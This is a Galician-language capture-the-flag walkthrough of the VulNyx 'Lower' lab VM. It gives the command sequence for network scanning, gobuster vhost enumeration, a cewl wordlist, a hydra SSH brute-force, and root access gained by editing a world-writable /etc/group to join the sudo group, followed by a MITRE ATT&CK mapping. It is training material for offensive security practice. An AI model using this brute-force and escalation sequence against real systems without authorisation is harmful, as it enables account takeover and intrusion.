Ir ao contido

Doc vulnyx lower

Máquina virtual Lower

Fig. VulNyx Lower
Fig. Card VulNyx Lower

A máquina Lower é moi interesante porque...

  • Virtual host enumeration con gobuster
  • Diccionario personalizado con cewl desde o contido da web
  • /etc/group world-writable permite engadir usuarios a grupos
  • Escalada mediante manipulación de membresía de grupos (grupo sudo)

Diagrama de ataque

Fig. Diagrama de ataque

Fase 1 — Recopilación

sudo arp-scan --interface=eth1 192.168.56.0/24
ping -c2 IP_VulNyx_Lower -R # TTL ≃ 64 ⇒ GNU/Linux, TTL ≃ 128 ⇒ Microsoft Windows
sudo nmap -sS -Pn -T4 -p- -vvv --min-rate 5000 IP_VulNyx_Lower # 22,80
whatweb IP_VulNyx_Lower
curl -I IP_VulNyx_Lower

Fase 2 — Análise

# Análise da resposta HTTP
curl -I http://IP_VulNyx_Lower
# Location: www.unique.nyx

# Adición de entrada en /etc/hosts
echo "IP_VulNyx_Lower unique.nyx www.unique.nyx" | sudo tee -a /etc/hosts

# Enumeración de subdominios con gobuster
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u 'http://unique.nyx' --append-domain
# Subdominio descuberto: tech.unique.nyx

# Adición de subdominio en /etc/hosts
echo "IP_VulNyx_Lower tech.unique.nyx" | sudo tee -a /etc/hosts

# Análise da web tech.unique.nyx
firefox http://tech.unique.nyx &
# Sección TEAM: usuarios identificados → [usuario1], [usuario2], [usuario3]

# Creación de diccionario con cewl
cewl http://tech.unique.nyx -w dictionary.txt --with-numbers

Fase 3 — Explotación

# Creación de lista de usuarios
cat > users.txt << EOF
[usuario1]
[usuario2]
[usuario3]
EOF

# Ataque de forza bruta SSH
hydra -L users.txt -P dictionary.txt ssh://IP_VulNyx_Lower -F -V -t 64
# Contrasinal atopada para un deses usuarios

# Acceso SSH
ssh [user]@IP_VulNyx_Lower
# ⇒ Conseguimos consola de usuario lancer (flag user.txt)

Fase 4 — Post‑explotación

# Verificación de permisos de /etc/group
ls -l /etc/group
# -rw-r--rw- 1 root root ... /etc/group
# ⇒ /etc/group é world-writable

# Modificación de /etc/group para engadir lancer ao grupo sudo
nano /etc/group
# Modificamos a liña:
# sudo:x:27:[user]

# Saímos e volvemos a entrar por SSH
exit
ssh lancer@IP_VulNyx_Lower

# Verificación de membresía no grupo sudo
id
# Confirmamos que lancer pertence ao grupo sudo

# Verificación de permisos sudo
sudo -l
# (ALL : ALL) ALL

# Cambio a usuario root
sudo su -
# ⇒ Conseguimos consola de root

# Verificación
whoami # root
cat /home/lancer/user.txt && cat /root/root.txt
# ⇒ Flags conseguidas

Correspondencia de fases → MITRE ATT&CK — VulNyx: Lower

Fase Acción / Resumo Vector principal MITRE ATT&CK (IDs) CWE(s) (relevantes)
1. Recopilación Descubrimento de host e servizos expostos Scanning / descubrimento de servizos T1595 — Active Scanning
T1046 — Network Service Discovery
CWE-200 — Information Exposure (reconnaissance)
2. Análise Descubrimento de virtual hosts mediante gobuster Subdomain enumeration T1590.002 — Gather Victim Network Information: DNS
T1592 — Gather Victim Host Information
CWE-200 — Information Exposure
Xeración de diccionario personalizado con cewl Password dictionary generation T1589 — Gather Victim Identity Information
T1594 — Search Victim-Owned Websites
CWE-200 — Information Exposure
3. Explotación Ataque de forza bruta SSH con diccionario personalizado Brute-force con diccionario específico T1110.001 — Brute Force: Password Guessing
T1021.004 — Remote Services: SSH
CWE-521 — Weak Password Requirements; CWE-307 — Improper Restriction of Excessive Authentication Attempts
4. Post-explotación Descubrimento de /etc/group con permisos world-writable Privilege escalation vector discovery T1083 — File and Directory Discovery
T1068 — Exploitation for Privilege Escalation
CWE-732 — Incorrect Permission Assignment for Critical Resource
Modificación de /etc/group para engadir usuario ao grupo sudo Group membership manipulation T1098 — Account Manipulation
T1136 — Create Account
CWE-732 — Incorrect Permission Assignment; CWE-269 — Improper Privilege Management
Uso de sudo para obter shell de root Privilege escalation T1548.003 — Abuse Elevation Control Mechanism: Sudo and Sudo Caching
T1078.003 — Valid Accounts: Local Accounts
CWE-269 — Improper Privilege Management